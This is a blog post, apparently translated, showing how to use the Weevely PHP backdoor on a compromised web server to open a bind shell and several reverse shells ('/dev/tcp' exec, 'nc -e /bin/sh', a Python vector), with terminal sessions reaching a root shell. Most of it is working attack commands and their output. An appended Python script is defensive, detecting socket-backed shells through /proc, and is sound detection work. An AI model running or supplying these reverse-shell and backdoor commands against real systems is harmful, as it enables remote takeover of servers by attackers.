PHP backdoor Weevely 4: swapping shells
Posted on 2012-8-26 19:55:20

Sometimes you have to switch to a different shell, for example for privilege escalation.

1. BIND SHELL

Specify port 1234:

    www-data@ubuntu:/var/www$ :backdoor.tcp port=1234
    [modules.backdoor.tcp] Port open. Run telnet to connect and terminate commands using semicolon

Connect:

    root@Dis9Team:/pen/door/Weevely# nc -v 5.5.5.4 1234
    Connection to 5.5.5.4 1234 port [tcp/*] succeeded!
    /bin/sh: can't access tty; job control turned off
    $ id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    $

Or use Metasploit.

2. reverse_tcp

This is the important part. It can connect back in 4 ways:
devtcp, netcat-traditional, netcat-bsd, python

1. DEV TCP

    exec /bin/sh 0</dev/tcp/REMOTE_HOST/REMOTE_PORT 1>&0 2>&0

Then listen with nc on the remote host. For example, run this on the SERVER:

    root@ubuntu:/var/www# exec /bin/sh 0</dev/tcp/5.5.5.2/12345 1>&0 2>&0

UB1 listens:

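    root@Dis9Team:/pen/door/Weevely# nc -l -v 12345
    Connection from 5.5.5.4 port 12345 [tcp/*] accepted
    id
    uid=0(root) gid=0(root) groups=0(root)

2. NC SHELL

    nc -e /bin/sh 5.5.5.2 4444

3. Python SHELL

This one is the same as other reverse-connect scripts.

Q: Why is there no C?
There are many shells written in C, but many servers forbid it, or the web user has no permission.

For this demonstration I use Python to connect back:
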
    www-data@ubuntu:/var/www$ :backdoor.reverse_tcp host=5.5.5.2 port=123 vector=python
    [modules.backdoor.reverse_tcp] Reverse backdoor connected. End commands with semicolon

Listen locally:

    root@Dis9Team:/pen/door/Weevely# nc -l -v 123
    Connection from 5.5.5.4 port 123 [tcp/ntp] accepted
    /bin/sh: can't access tty; job control turned off
    $
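
Added example (not part of the original post, and not Weevely code): the DEV TCP one-liner above leaves /bin/sh with stdin, stdout and stderr all attached to one TCP socket, and this script finds processes in that state by walking /proc on a Linux host. The function names, the list of shell names and the little-endian decoding of net/tcp are assumptions of this example.

```python
import os, socket, struct

SHELLS = {"sh", "bash", "dash", "ash", "ksh", "zsh"}  # assumed list of shell names

def _read(path):
    try:
        with open(path) as fh:
            return fh.read()
    except OSError:
        return ""

def _tcp_peers(base):
    """Map socket inode -> 'ip:port' of the remote end, from <pid>/net/tcp (IPv4 only)."""
    peers = {}
    for line in _read(os.path.join(base, "net", "tcp")).splitlines()[1:]:
        f = line.split()
        if len(f) >= 10:
            ip_hex, port_hex = f[2].split(":")
            # Assumption: little-endian host, so the hex address is byte-swapped.
            ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
            peers[f[9]] = f"{ip}:{int(port_hex, 16)}"
    return peers

def _uid(base):
    for line in _read(os.path.join(base, "status")).splitlines():
        if line.startswith("Uid:"):
            return int(line.split()[1])  # real uid
    return None

def socket_backed_shells(proc_root="/proc"):
    """Return (pid, uid, comm, peer) for shells whose fds 0, 1 and 2 share one TCP socket."""
    hits = []
    for entry in sorted(filter(str.isdigit, os.listdir(proc_root)), key=int):
        base = os.path.join(proc_root, entry)
        comm = _read(os.path.join(base, "comm")).strip()
        if comm not in SHELLS:
            continue
        try:
            fds = {os.readlink(os.path.join(base, "fd", n)) for n in "012"}
        except OSError:  # process exited, or fds not readable without root
            continue
        target = fds.pop() if len(fds) == 1 else ""
        # Unix-domain sockets have no row in net/tcp, so they yield no peer.
        peer = _tcp_peers(base).get(target[8:-1]) if target.startswith("socket:[") else None
        if peer:
            hits.append((int(entry), _uid(base), comm, peer))
    return hits

if __name__ == "__main__":
    print(socket_backed_shells())
```

A shell whose descriptors are pipes or a FIFO rather than the socket itself does not match, and IPv6 peers (net/tcp6) are not read.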